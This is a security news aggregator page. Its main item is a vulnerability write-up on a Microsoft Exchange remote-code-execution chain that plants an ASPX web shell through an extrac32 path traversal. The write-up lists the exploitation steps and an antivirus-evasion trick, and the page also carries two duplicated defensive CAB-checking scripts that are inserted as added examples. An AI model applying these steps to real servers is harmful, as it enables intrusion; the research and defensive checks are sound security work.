Malwarebytes has uncovered a malicious campaign targeting Mac and iPhone users seeking AppleCare+ support. Scammers have been using Google ads to redirect unsuspecting victims to fake AppleCare+ support pages hosted on GitHub, tricking them into calling fraudulent support lines. From there, call center agents posing as Apple representatives extract money and personal information from the … The post Phony AppleCare+ Pages Hosted on GitHub Promoted via Google Ads appeared first on CyberInsider.

by Cyber Insider

Most investors aren't demanding cybersecurity preparedness from startups, but founders should still be worried about the risks.

by Dark Reading

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void). "It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus

by The Hacker News

Transport for London (TfL) has disclosed a significant cyber security incident that exposed customer data, including 5,000 Oyster card users. The breach, discovered on September 1, 2024, revealed suspicious activity on TfL's systems, prompting an investigation involving the National Crime Agency (NCA) and the National Cyber Security Centre (NCSC). The NCA announced today that it … The post Transport for London Investigates Data Breach in Oyster Cards appeared first on CyberInsider.

by Cyber Insider

Doctor Web has identified a widespread infection targeting Android TV boxes through a malware strain dubbed Android.Vo1d. This backdoor trojan has affected nearly 1.3 million devices in 197 countries, compromising system files and enabling attackers to remotely install software on users' devices. The issue came to light in August 2024 when several users reached out … The post 1.3 Million Android TV Boxes Infected by New 'Vo1d' Malware appeared first on CyberInsider.

by Cyber Insider

Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns. "Selenium Grid is a server that facilitates running test cases in parallel across different browsers and versions," Cado Security researchers Tara Gould and Nate Bill said in an analysis published today. "However, Selenium Grid's default configuration lacks

by The Hacker News

AttackIQ has released a new attack graph that seeks to emulate the Tactics, Techniques and Procedures (TTPs) associated with Ebury Linux malware. Despite previous arrests and actions against key perpetrators, Ebury continues to evolve, and its operations remain active. The post Emulating the Persistent and Stealthy Ebury Linux Malware appeared first on AttackIQ.

by AttackIQ

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America.

by Cisco Talos Blog

Keeping track of the many variants of Atomic Stealer can be a challenge for SOC teams. Our guide breaks down the latest versions. The post From Amos to Poseidon | A SOC Team’s Guide to Detecting macOS Atomic Stealers 2024 appeared first on SentinelOne.

by SentinelOne

Threat actors have infected over 1.3 million TV streaming boxes running Android with a new Vo1d backdoor malware, allowing the attackers to take full control of the devices. [...]

by BleepingComputer

In the wake of a gathering of industry leaders at Microsoft to discuss the endpoint-security ecosystem, some thoughts

by Sophos News

Cato CTRL (Cyber Threats Research Lab) has released its Q2 2024 Cato CTRL SASE Threat Report. The report highlights critical findings based on the analysis of a staggering 1.38 trillion network flows from more than 2,500 of Cato’s global customers, between April and June 2024. Key Insights from the Q2 2024 Cato CTRL SASE Threat Report The report is packed with unique insights that are based on

by The Hacker News

Iraqi government networks have emerged as the target of an "elaborate" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called OilRig. The attacks singled out Iraqi organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis. OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug,

by The Hacker News

The Irish Data Protection Commission (DPC) has announced that it has commenced a "Cross-Border statutory inquiry" into Google's foundational artificial intelligence (AI) model to determine whether the tech giant has adhered to data protection regulations in the region when processing the personal data of European users. "The statutory inquiry concerns the question of whether Google has complied

by The Hacker News

Safety Check is getting an upgrade, and now you'll be able to better manage website notifications and permissions.

by ZDNET Security

Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.

by Malwarebytes Labs

A recent National Crime Agency (NCA) investigation led to the arrest of a teenager in Walsall, England, linked…

by Hackread

Meta has admitted to scraping Australian Facebook users' public photos, posts and other data to train its AI models, including those of kids on adult profiles.

by Malwarebytes Labs

As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of 4 blog posts is meant to supplement the talk and provide additional technical details. You can read the first post in this series here. In part 2, I describe the ApprovedApplicationCollection gadget, which was available for abuse because it did not appear on the deny list and could therefore be accessed via MultiValuedProperty. I am also presenting a path traversal in the Windows utility extrac32.exe, which allowed me to complete the chain for a full RCE in Exchange. For the moment, at least, Microsoft has made a decision not to fix this path traversal bug. You can watch the full talk here: "Half Measures and Full Compromise: Exploiting Microsoft Exchange PowerShell Remoting". This blog post covers the part from 18:10 to 21:10.

Introduction

In the previous post, I described two RCE vulnerabilities, CVE-2023-21529 and CVE-2023-32031. In this post, I present the next RCE that I found in Microsoft Exchange. It consists of a chain of two vulnerabilities:

• CVE-2023-36756 – a vulnerability in Exchange Server.
• ZDI-CAN-21499 – an unpatched path traversal vulnerability in the Windows utility extrac32.exe.

Microsoft decided that ZDI-CAN-21499 would not be fixed as "Windows customers are not exposed to this vulnerability." They also note that, in their view, "It is the caller's (the application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files." As we will see in this article, though, the extrac32 issue can be used to an attacker's advantage.

The Patch for CVE-2023-32031

While Microsoft was dealing with the ProxyNotShell chain back in 2022, I took some time to look for different classes that could be abused to exploit PowerShell Remoting for some security impact, such as RCE, file disclosure, denial of service, or NTLM relaying. I found around 30 unique classes and reported them to Microsoft. Those submissions were marked as duplicates and were ignored, which in my opinion was a mistake. The initial patch for ProxyNotShell included an allow list, so it seems that the deficiencies in the separate deny list did not attract the attention they should have. The problem became evident later when I discovered the vulnerable MultiValuedProperty class (CVE-2023-21529). This class was present on the allow list, and it allowed me to access a separate, internal deserialization mechanism not subject to the allow list sanitization. Even after the internal MultiValuedProperty deserialization mechanism was hardened by means of the deny list, I was able to easily abuse the classes that I had reported many months before, as they had not been added to the deny list. For example, I was able to use the Command class, as I described in the previous post. I had originally reported this class to Microsoft in September 2022, but I was able to reuse it for CVE-2023-32031 almost seven months later because it did not appear on the deny list introduced in the patch for MultiValuedProperty.

To patch CVE-2023-32031, Microsoft expanded the deny list to include all the classes that I had previously reported in 2022. The patch went no further than that. Critically, it still did not introduce an allow list, so it was game on. All I had to do was find another class with security impact not included in the deny list, and then I could use MultiValuedProperty to deserialize it. This became my next challenge.

CVE-2023-36756 – ApprovedApplicationCollection

I was looking for classes where something potentially malicious could be reached either through a single-argument constructor or a static Parse(String) method. This approach led me to the Microsoft.Exchange.Data.Directory.SystemConfiguration.ApprovedApplicationCollection class. As you can see, we can deliver an object of any type to the constructor. The code flow can go in multiple directions from here. We are interested in the case where a string is provided to the constructor. When a string is provided, the code expects it to be a valid path to a file with a .cab extension. The code does not validate the path in any meaningful way except for checking the extension. The code leads to the ParseCab method, where the argument contains the attacker-supplied path:

At [1], a FileInfo object is created from the attacker's path. At [2] and [3], a temporary output directory is created. At [4], the OpenCabinetFile method is called. At [5], the entire temporary directory is deleted.

At this stage, we can confirm two things. We can deliver a UNC path, such as \\192.168.1.100\poc\poc.cab. Exchange PowerShell Remoting requires Kerberos authentication, so the attacker most likely resides in the internal network anyway. It is rather rare to see SMB traffic filtered internally. Thus, in most cases it will not present a challenge for the attacker to host content that the Exchange server can access over SMB.

Next, our remote path is processed by OpenCabinetFile. Let's analyze this method. It seems that our cabinet file is going to be extracted with the following command:

extrac32.exe /Y /E /L "C:\Windows\Temp\random-uuid\" "\\192.168.1.100\poc\poc.cab"

Basically, the content of our remote CAB file will be extracted to some temporary directory. Then, the entire directory will be deleted. There do not seem to be any unsafe operations available here. As we will see, though, it turns out that extrac32 has its own issues.

ZDI-CAN-21499 – Unpatched Path Traversal in extrac32

In general, we can use the ApprovedApplicationCollection internal Exchange class to extract our CAB file with the Windows utility extrac32.exe. This could lead to a file parsing bug, where the parsing part is performed by some unmanaged code. We could always try to look for memory corruptions in extrac32.exe. Before even thinking about it, I decided to go for the full-dumb option, which can be summarized with the following meme. I simply created a CAB containing a single file, where the filename contains the path traversal sequence ..\, and tested it. It turned out that the extrac32 extraction mechanism is vulnerable to a trivial path traversal.

There is still one problem, though. The file presented in the screenshot gets detected as malicious by Windows Defender. Luckily for the attackers, antivirus signatures are not always very smart, and this one can be easily bypassed. For example:

..\poc.txt - the CAB file gets tagged as malicious by Windows Defender.
../poc.txt - the CAB file is seen as legitimate by Windows Defender.

I reported the path traversal vulnerability to Microsoft in June of 2023. After a short discussion, we received the following final response from the vendor: "To clarify our earlier point – it is the caller's (application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files." To me, this does not seem sensible. It seems like the equivalent of asking people to manually verify the contents of a ZIP file before you unzip it with one of the available solutions. However, this was Microsoft's final reply. The upshot was that since Microsoft clearly stated that it is going to be Exchange's fault for the way it uses extrac32, I could use this to get a CVE in Exchange.

Chaining the Pieces

The attacker needs to do the following to exploit this vulnerability:

-- Create a malicious CAB file that contains an ASPX web shell, with the file name set to something like ../../../../../../../../inetpub/wwwroot/poc.aspx.
-- Host this CAB file on an SMB share in the domain.
-- Perform PowerShell Remoting deserialization, where:
       -- The target type is MultiValuedProperty<ApprovedApplicationCollection>.
       -- The argument is a UNC path pointing to our CAB file, such as: \\192.168.1.100\poc\poc.cab.
-- Access the webshell and get code execution.

Fragment of the payload:

After this, you can enjoy your web shell. As always, I have prepared a demo that presents the entire exploitation process.

Summary

In this blog post, I have presented the CVE-2023-36756 vulnerability in Microsoft Exchange Server. It allowed any authenticated attacker to achieve remote code execution by uploading a web shell. In my next blog post, part 3 of the Exchange PowerShell Remoting series, I am going to present my CVE-2023-36745 RCE vulnerability. To make it work, I had to prepare one of the craziest chains that I have ever made, so I am excited to share it with you. Once again, you can watch my entire OffensiveCon 2024 talk here. Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, Bluesky, or Instagram for the latest in exploit techniques and security patches.
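Since the vendor's position is that the caller must never hand extrac32 an untrusted CAB, the practical mitigation for any application that extracts cabinets is to vet the entry names before extraction. The following Python is an added example, not ZDI's or Microsoft's code: it walks the CFFILE records of a cabinet image and rejects names that would escape the output directory, treating `/` and `\` alike so the separator swap that slipped past the antivirus signature above makes no difference. The cabinet bytes it checks are constructed by the script itself (header and file records only, no data blocks).

```python
"""Pre-extraction vetting of CAB entry names (added example, not ZDI's code).

Parses only the CFHEADER and CFFILE records of a cabinet image, which is all
that is needed to see the names extrac32 would write to disk."""
from __future__ import annotations

import struct
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# CFHEADER: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
#           versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")        # 36 bytes
# CFFILE: cbFile, uoffFolderStart, iFolder, date, time, attribs, then szName\0
CFFILE = struct.Struct("<IIHHHH")                  # 16 bytes before the name
CFFOLDER = struct.Struct("<IHH")                   # coffCabStart, cCFData, typeCompress
A_NAME_IS_UTF = 0x80                               # attribs bit: name is UTF-8


def cab_entry_names(data: bytes) -> List[str]:
    """Return the szName of every CFFILE record in a cabinet image."""
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, _vmin, _vmaj,
     _n_folders, n_files, _flags, _set_id, _icab) = CFHEADER.unpack_from(data, 0)
    if sig != b"MSCF":
        raise ValueError("not a cabinet file")
    if cb_cabinet > len(data):
        raise ValueError("truncated cabinet image")
    # coffFiles points straight at the first CFFILE, so optional header
    # fields and CFFOLDER records need not be walked to list the names.
    pos = coff_files
    names: List[str] = []
    for _ in range(n_files):
        _cb, _off, _ifolder, _date, _time, attribs = CFFILE.unpack_from(data, pos)
        pos += CFFILE.size
        end = data.index(b"\x00", pos)
        raw = data[pos:end]
        names.append(raw.decode("utf-8" if attribs & A_NAME_IS_UTF else "cp1252"))
        pos = end + 1
    return names


def unsafe_entry(name: str) -> Optional[str]:
    """Reason the entry must not be extracted, or None if it stays inside
    the output directory.  PureWindowsPath splits on both '\\' and '/',
    so '..\\poc.txt' and '../poc.txt' are judged identically."""
    if not name:
        return "empty name"
    p = PureWindowsPath(name)
    if p.drive or p.root:           # C:\..., \..., \\server\share\...
        return "absolute or UNC path"
    if ".." in p.parts:             # any parent-directory component, anywhere
        return "parent-directory component"
    return None


def vet_cabinet(data: bytes) -> Dict[str, str]:
    """Map each rejected entry name to its reason; an empty dict means the
    caller may go ahead and extract."""
    rejected: Dict[str, str] = {}
    for name in cab_entry_names(data):
        reason = unsafe_entry(name)
        if reason is not None:
            rejected[name] = reason
    return rejected


def build_cab(names: List[str]) -> bytes:
    """Constructed fixture: a header-only cabinet image with one empty file
    record per name and no CFDATA blocks (extraction tools would reject it;
    it exists only to exercise the name listing)."""
    files = b"".join(CFFILE.pack(0, 0, 0, 0, 0, A_NAME_IS_UTF) + n.encode("utf-8") + b"\x00"
                     for n in names)
    folder = CFFOLDER.pack(0, 0, 0)
    coff_files = CFHEADER.size + CFFOLDER.size
    header = CFHEADER.pack(b"MSCF", 0, coff_files + len(files), 0, coff_files, 0,
                           3, 1, 1, len(names), 0, 0, 0)
    return header + folder + files


if __name__ == "__main__":
    sample = build_cab(["approved/app.xml", "..\\poc.txt", "../poc.txt", "C:\\x.dll"])
    for entry, why in vet_cabinet(sample).items():
        print(f"reject {entry!r}: {why}")
```

A caller that wraps extrac32 (or any cabinet API) would run `vet_cabinet` on the bytes first and refuse the whole archive if anything comes back, rather than trusting the extractor to stay inside its `/L` directory.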

by Zero Day Initiative Blog
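Microsoft's reply in the post above puts the burden on the caller of extrac32 to refuse untrusted cabinets. The following is an added editorial example, not code from the Zero Day Initiative post, from Microsoft, or from Exchange: a small Python inspector that reads the CFFILE names out of a CAB without extracting anything and rejects any entry that could escape the destination directory. It normalises both separators, so it catches the ../poc.txt form that the post shows slipping past the Defender signature as well as the ..\ form the signature keyed on. The build_cab helper only produces a constructed, harmless sample cabinet in memory (zero compression, plain text contents); field layouts and offsets follow the public MS-CAB specification, and all function and constant names here are this example's own.

```python
import struct

# Layout constants from the MS-CAB specification
CAB_SIGNATURE = b"MSCF"
CFHEADER_SIZE = 36          # fixed part of CFHEADER
CFFOLDER_SIZE = 8           # CFFOLDER without abReserve
CFFILE_FIXED_SIZE = 16      # CFFILE fields that precede szName
ATTR_NAME_IS_UTF = 0x80     # CFFILE.attribs bit: szName is UTF-8
COMPRESS_NONE = 0


def build_cab(files):
    """Build a minimal single-folder, uncompressed CAB from [(name, data), ...].

    Constructed sample input for the scanner below. Names are written
    verbatim, so a name containing '..' lands in the CFFILE entry as-is.
    """
    cffile_entries = b""
    folder_offset = 0
    for name, data in files:
        attribs = ATTR_NAME_IS_UTF if not name.isascii() else 0
        # cbFile, uoffFolderStart, iFolder, date, time, attribs
        cffile_entries += struct.pack("<IIHHHH", len(data), folder_offset, 0, 0, 0, attribs)
        cffile_entries += name.encode("utf-8") + b"\x00"
        folder_offset += len(data)

    payload = b"".join(data for _, data in files)
    # One CFDATA block: csum (0 = not supplied), cbData, cbUncomp, ab[]
    cfdata = struct.pack("<IHH", 0, len(payload), len(payload)) + payload

    coff_files = CFHEADER_SIZE + CFFOLDER_SIZE          # offset of first CFFILE
    coff_cab_start = coff_files + len(cffile_entries)   # offset of first CFDATA
    cb_cabinet = coff_cab_start + len(cfdata)

    header = struct.pack(
        "<4sIIIIIBBHHHHH",
        CAB_SIGNATURE, 0, cb_cabinet, 0, coff_files, 0,
        3, 1,               # versionMinor, versionMajor
        1, len(files),      # cFolders, cFiles
        0, 0x1234, 0,       # flags, setID, iCabinet
    )
    folder = struct.pack("<IHH", coff_cab_start, 1, COMPRESS_NONE)
    return header + folder + cffile_entries + cfdata


def cab_file_names(blob):
    """Return the szName of every CFFILE entry without extracting anything.

    CFHEADER.coffFiles already accounts for the optional reserve/prev/next
    fields, so the CFFILE list can be addressed directly.
    """
    if blob[:4] != CAB_SIGNATURE:
        raise ValueError("not a CAB file")
    cb_cabinet = struct.unpack_from("<I", blob, 8)[0]
    if cb_cabinet != len(blob):
        raise ValueError("cbCabinet does not match file size (truncated or padded)")
    coff_files = struct.unpack_from("<I", blob, 16)[0]
    c_files = struct.unpack_from("<H", blob, 28)[0]
    names = []
    pos = coff_files
    for _ in range(c_files):
        attribs = struct.unpack_from("<IIHHHH", blob, pos)[5]
        pos += CFFILE_FIXED_SIZE
        end = blob.index(b"\x00", pos)
        encoding = "utf-8" if attribs & ATTR_NAME_IS_UTF else "cp1252"
        names.append(blob[pos:end].decode(encoding))
        pos = end + 1
    return names


def is_unsafe_name(name):
    """True if the entry could land outside the extraction directory.

    Both separators are normalised first so that '../x' and '..\\x' are
    treated alike; an absolute or drive-qualified name is rejected too.
    """
    parts = name.replace("\\", "/").split("/")
    absolute = name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":")
    return absolute or ".." in parts


def unsafe_cab_entries(blob):
    """Names that should stop the caller from handing this CAB to extrac32."""
    return [n for n in cab_file_names(blob) if is_unsafe_name(n)]


if __name__ == "__main__":
    sample = build_cab([("../poc.txt", b"harmless"), ("docs/readme.txt", b"hi"), ("..\\poc.txt", b"x")])
    print("entries:", cab_file_names(sample))
    print("rejected:", unsafe_cab_entries(sample))
```

The check is deliberately done on the container's own metadata rather than on anything the extractor prints, so it can run before extrac32 is ever invoked; a stricter deployment would additionally resolve each name against the destination with os.path.realpath and confirm it stays inside.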

A 17-year-old male was arrested in Walsall following a major cyberattack on Transport for London (TfL), the agency responsible for the city's transit systems. The National Crime Agency (NCA) announced today that the teenager was detained on suspicion of breaching the Computer Misuse Act, directly tied to a cyberattack launched on September 1. The NCA, collaborating closely with the National Cyber Security Centre (NCSC) and TfL, has taken the lead on the investigation. While the exact details of the attack remain undisclosed, officials remain focused on managing the risks and securing public infrastructure.

"Attacks on public infrastructure such as this can be hugely disruptive and lead to severe consequences for local communities and national systems," said Paul Foster, the NCA's National Cyber Crime Unit Deputy Director. The unnamed teenager was questioned by NCA officers and later released on bail. "We have been working at pace to support Transport for London following a cyberattack on their network, and to identify the criminal actors responsible," Foster noted.

Data at Risk as Transport for London Incident Unfolds

Cyberattacks targeting public infrastructure aren't just digital pranks; they threaten the core of urban life. TfL confirmed at the time that its internal systems had come under attack but reassured the public that transportation services were not disrupted. The agency took swift action to contain the threat and prevent further damage. Shashi Verma, TfL's chief technology officer, emphasized at the time that its systems and customer data remained secure. "We have implemented a series of measures to safeguard our internal systems and prevent further unauthorized access," Verma told the BBC. However, in a Thursday update TfL revealed that the situation is evolving and that its investigation has identified that certain customer data has been accessed.

"This includes some customer names and contact details, including email addresses and home addresses where provided," the announcement said. Preliminary investigations also found that some Oyster card refund data may have been accessed. An Oyster card is a smart card onto which money can be loaded so that commuters can pay on the go. "This could include bank account numbers and sort codes for a limited number of customers (around 5,000)," TfL said. TfL is working alongside the NCA and NCSC to secure its digital infrastructure and avoid any larger-scale fallout. Cybercrime, particularly attacks targeting public infrastructure, poses a growing challenge for law enforcement and cybersecurity professionals.

No Stranger to Cybersecurity Threats

While the current attack did not have a material impact on services, it is not TfL's first encounter with a cyber-related breach. In July 2023, a breach of a third-party vendor's MOVEit managed file transfer system exposed approximately 13,000 customer contact details; banking information was not affected. Interconnected systems can expose organizations to compromise even when the primary attack vector is not aimed directly at them. Attacks exploiting third-party software illustrate a common but often underestimated risk in digital security: supply chain vulnerabilities.

Young Hackers a Troubling Sign

The arrest of a teenage suspect in connection with the TfL cyberattack illustrates a larger pattern of increasingly young individuals becoming involved in cybercrime. One noteworthy case involves Arion Kurtaj, an 18-year-old hacker who breached Rockstar Games and Uber. Another well-known case is that of the Vastaamo hacker, Julius Kivimäki. He was arrested in 2013 at the age of 15 but received a non-custodial two-year suspended juvenile sentence. The lenient punishment likely failed to dissuade him: Kivimäki was swiftly implicated in several other hacks carried out with adolescent cohorts before vanishing for years and resurfacing in 2020 with the Vastaamo hack.

The reasons teens turn to such behavior are many, from curiosity to money, but law enforcement agencies have observed this trend growing rapidly in recent years as hacking tools become more accessible. The tools available to cybercriminals have evolved beyond the stereotypical lone hacker in a dark room. The rise of ransomware-as-a-service (RaaS) platforms and the development of more sophisticated malware have enabled even low-skilled attackers to create chaos. For public infrastructure like TfL, the stakes could not be higher. Urban centers rely on interconnected transportation, power, and communication networks that, if disrupted, could paralyze entire cities; the recent TfL incident is a wake-up call.

Ransomware's Growing Threat to Public Infrastructure

While the NCA has not confirmed whether the September 1 attack involved ransomware, recent history suggests that public infrastructure remains a high-value target for such attacks. Cybercriminal groups have increasingly targeted critical services, knowing the immense pressure these systems face to remain operational. A well-timed ransomware attack could lock down key services, causing widespread disruption and leading to significant ransom demands. Globally, ransomware attacks have hit everything from hospitals to power grids. In 2021, the Colonial Pipeline attack in the United States shut down a major fuel supply line, leading to panic buying and fuel shortages along the East Coast. An attack of similar scale on TfL could potentially shut down the entire transport system, causing chaos in one of the world's busiest cities.

Lessons Learned: Strengthening Cyber Defenses

For organizations like TfL, the importance of cybersecurity cannot be overstated. The rapid response by both TfL and the NCA likely helped prevent a catastrophic impact from the September 1 attack. Their coordination with the NCSC and other government agencies further illustrates the value of a multi-layered defense strategy. Paul Foster's emphasis on preventing cybercriminals from "acting with impunity" highlights the NCA's proactive approach to tracking and stopping digital threats before they escalate. While public entities must invest in cybersecurity technology, law enforcement must keep pace with cybercriminals' evolving tactics. Beyond prevention, resilience plays a key role in mitigating the effects of cyberattacks. TfL's immediate focus on securing its infrastructure reflects the need for rapid, well-coordinated response efforts when incidents occur. The next step will involve determining the extent of the attack and identifying long-term strategies for preventing future breaches.

*Update September 13, 2:00 AM ET: The article was updated with the latest announcement from Transport for London revealing that some customer data was accessed.

by The Cyber Express

We dug into PartnerLeak, the site behind the ""your partner is cheating on you"" emails, including how and where the scammers get their information.

by Malwarebytes Labs

Recently in the SOC, we were notified by a partner that they had a potential business email compromise, or BEC. We commonly catch these by identifying suspicious email forwarding rules, […] The post Monitoring High Risk Azure Logins  appeared first on Black Hills Information Security.

by Black Hills Information Security

The UK National Crime Agency has arrested and detained a suspect – a 17-year-old male in Walsall (West Midlands) – on suspicion of Computer Misuse Act offences in relation to the Transport for London (TfL) cyberattack, the agency announced today. Also today, TfL provided some insight into what its investigation has discovered, namely that the attack was first noticed on September 1 (Sunday), and that some customer data has been accessed – though … More → The post Suspect arrested over the Transport for London cyberattack appeared first on Help Net Security.

by Help Net Security

12 quarters, 100% protection.

by ThreatDown

The FBI says that 2023 was a record year for cryptocurrency fraud, with total losses exceeding $5.6 billion, based on nearly 70,000 reports received through the Internet Crime Complaint Center (IC3). [...]

by BleepingComputer

At Cloudflare, we protect customer APIs from abuse. This is no easy task, as abusive traffic can take different forms, from giant DDoS attacks to low-and-slow credential stuffing campaigns. We now address this challenge in a new way: by looking outside typical volumetric measures and using statistical machine learning to find important API client request sequences.

by Cloudflare

An explosives expert told TechCrunch that the ChatGPT output could be used to make a detonatable product and was too sensitive to be released. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Druva launched Dru Investigate, a gen AI-powered tool that guides data security investigations using a natural language interface. With Dru Investigate, users across IT, security, legal, and privacy teams can swiftly identify and mitigate data risks, without needing to write complicated queries. Built on Amazon Bedrock, an AWS service to easily build and scale generative AI applications with foundation models, Dru Investigate leverages Druva’s insights from protected data to streamline cyber and legal investigations. Data … More → The post Dru Investigate simplifies cyber investigations and helps users uncover data threats appeared first on Help Net Security.

by Help Net Security

Silver Spring, United States, 12th September 2024, CyberNewsWire

by Hackread

Understanding a threat is just as important as the steps taken toward prevention.

by Dark Reading

Learn about Sam Horvath's journey from pentester to Managing Director at NetSPI, with cybersecurity leadership tips for aspiring technologists. The post 5 Essential Cybersecurity Leadership Tips for Technologists appeared first on NetSPI.

by NetSPI

A new federal road map on internet routing addresses a Border Gateway Protocol (BGP) vulnerability and provides tips on how to improve internet routing security.

by ITPro Today

OpenAI has said that AI with the power to reason represents a significant step in the technology''s progress.

by ITPro Today

Cybercriminals are increasingly targeting retail affiliate programs with sophisticated cryptocurrency scams. Retailers and customers must stay alert against…

by Hackread

Mastercard goes fishing and lands threat intelligence firm Recorded Future in its net for a record deal. Global payments network Mastercard is set to acquire Recorded Future in a deal valued at $2.65 billion. The acquisition, which is expected to close by the first quarter of 2025, pending regulatory review and standard closing conditions, will help Mastercard further fortify its cybersecurity capabilities and extend its reach into the growing threat intelligence space. Mastercard's purchase of Boston-based Recorded Future, currently owned by private equity firm Insight Partners, reflects the credit card giant's strategy to strengthen its digital security offerings. "The acquisition bolsters the insights and intelligence used to secure today's digital economy – in the payments ecosystem and beyond," Mastercard said in an official statement.

Mastercard Acquisition for Combating Cybercrime

Mastercard, which already offers a range of fraud prevention and cybersecurity services that leverage artificial intelligence (AI) and other advanced technologies, views this acquisition as crucial in combating the rising tide of financial crime. The company said the acquisition would further enrich its fraud prevention tools, real-time decisioning, and cybersecurity services, expanding its ability to deliver actionable intelligence to its network of merchants, financial institutions, and other partners. "Trust is the foundation of any relationship. Recorded Future adds to how we deliver that greater peace of mind before, during, and after the payment transaction. Together we will innovate faster, create smarter models, and anticipate emerging threats before cyberattacks can take place – in payments and beyond," said Craig Vosburg, Chief Services Officer at Mastercard. Founded in 2009, Recorded Future serves over 1,900 clients across 75 countries, including federal governments and several Fortune 500 companies. The firm provides real-time visibility into potential cyber threats by analyzing an expansive set of data sources. This insight allows its customers to address risks preemptively, a capability that Mastercard sees as essential to securing the broader digital economy, particularly in the payments sector. Recorded Future's ability to gather and analyze a vast array of data using AI aligns with Mastercard's strategy of deploying advanced technology to stay ahead of evolving cyber threats. By acquiring Recorded Future, Mastercard is not only broadening its own cybersecurity portfolio but also reinforcing its position in digital trust and security.

Synergies Between AI and Threat Intelligence

Both Mastercard and Recorded Future are at the forefront of leveraging AI to enhance cybersecurity. The two companies already collaborate on an AI-supported service that alerts financial institutions more quickly and accurately when a payment card is likely to have been compromised. Bringing Recorded Future's AI-driven threat intelligence under Mastercard's umbrella will likely result in enhanced products and services for customers, who will benefit from the combined expertise in cybersecurity and intelligence. Mastercard's global network and reach present an opportunity for Recorded Future to scale its operations and further develop its technology. Christopher Ahlberg, CEO of Recorded Future, expressed optimism about the deal: "Fifteen years ago, we created Recorded Future with a simple goal to secure the world with intelligence. By joining Mastercard, we see an opportunity to help more businesses and governments determine the steps to realize their full potential – and to enable everyone to feel safer in their daily lives."

Positioning for the Future of Digital Security

The acquisition comes at a time when cybercrime is at an all-time high, with threats becoming more advanced and extensive. The rise in digital transactions, the expansion of e-commerce, and the increased reliance on online services have created new vulnerabilities that businesses and governments alike are struggling to address. Mastercard's investment in Recorded Future reflects a growing recognition that proactive threat intelligence is essential in mitigating these risks. Mastercard has been steadily building its cybersecurity portfolio over the years, with acquisitions and partnerships designed to enhance its fraud prevention and risk management capabilities. Last year, Mastercard acquired Swedish firm Baffin Bay Networks, which provides threat protection services aimed at stopping attackers from penetrating or taking down systems. Before that, in 2019, the payments giant acquired RiskRecon, a company whose scanning and evaluation technology helps organizations proactively manage cyber risk and better safeguard critical intellectual property and consumer and payment data. This latest acquisition signals the company's intent to play a larger role in shaping the future of cybersecurity, particularly in the payments ecosystem, where trust and security are paramount. The deal also highlights the increasing importance of threat intelligence in the broader digital world.

by The Cyber Express

Saviynt, a leading provider of cloud-native identity and governance platform solutions, has announced the launch of its highly anticipated Intelligence Suite, which includes the general availability of Intelligent Recommendations. This new offering promises to revolutionize identity security with its advanced features, including dynamic role management, tailored access recommendations, actionable insights, and a multi-dimensional weighted trust […] The post Saviynt Launches Innovative Intelligence Suite to Transform Identity Security appeared first on IT Security Guru.

by IT Security Guru

Artificial intelligence and machine learning are becoming increasingly crucial to cybersecurity systems. Organizations need professionals with a strong background that mixes AI/ML knowledge with cybersecurity skills, bringing on board people like Nicole Carignan, Vice President of Strategic Cyber AI at Darktrace, who has a unique blend of technical and soft skills. Carignan was originally a […] The post How I got started: AI security executive appeared first on Security Intelligence.

by Security Intelligence

Kransom ransomware hides within the StarRail game using DLL side-loading and a legitimate certificate from COGNOSPHERE PTE. LTD.…

by Hackread

For legitimate purposes, these VPNs are the best options available for supporting safe, secure, and speedy downloads.

by ZDNET Security

Fortinet, a major player in the global cybersecurity sector, has disclosed a data breach involving a third-party service, affecting a small number of its Asia-Pacific customers. The breach reportedly exposed limited customer data stored on a cloud-based shared file drive used by Fortinet. However, a hacker, operating under the alias “Fortibitch,” has claimed responsibility for … The post Fortinet Confirms Third-Party Data Breach Amid Hacker’s 440 GB Theft Claim appeared first on CyberInsider.

by Cyber Insider

Programmers, the behind-the-scenes innovators driving technological progress, are honored on International Programmers' Day, observed on the 256th day of each year, to recognize their invaluable contributions.

by ITPro Today


Users have reported three issues: files randomly disappearing, phantom notifications for messages that don''t exist, and persistent audio feedback during meetings.

by ITPro Today

This article will focus on the Phishing Chronology. Analyzing 88,014 phishing URLs collected from public sources and Zimperium data, we will show how dynamic and fast-evolving phishing threats are. The post A Network of Harm: Gigabud Threat and Its Associates appeared first on Zimperium.

by Zimperium

WordPress.org has announced a new account security measure that will require accounts with capabilities to update plugins and themes to activate two-factor authentication (2FA) mandatorily. The enforcement is expected to come into effect starting October 1, 2024. ""Accounts with commit access can push updates and changes to plugins and themes used by millions of WordPress sites worldwide,"" the

by The Hacker News

Claroty warned the prevalence of remote access tool sprawl, often linked to ransomware, raises the risk of malicious activity.

by Cybersecurity Dive

A vendor honeypot caught two attacks intended to leverage the tens of thousands of exposed Selenium Grid Web app testing servers.

by Dark Reading

The Vision Pro uses 3D avatars on calls and for streaming. These researchers used eye tracking to work out the passwords and PINs people typed with their avatars.

by WIRED Security News

Barracuda threat analysts have recently identified a rise in phishing attacks that leverage trusted content creation and collaboration platforms popular with schools and designers as well as businesses.

by Barracuda

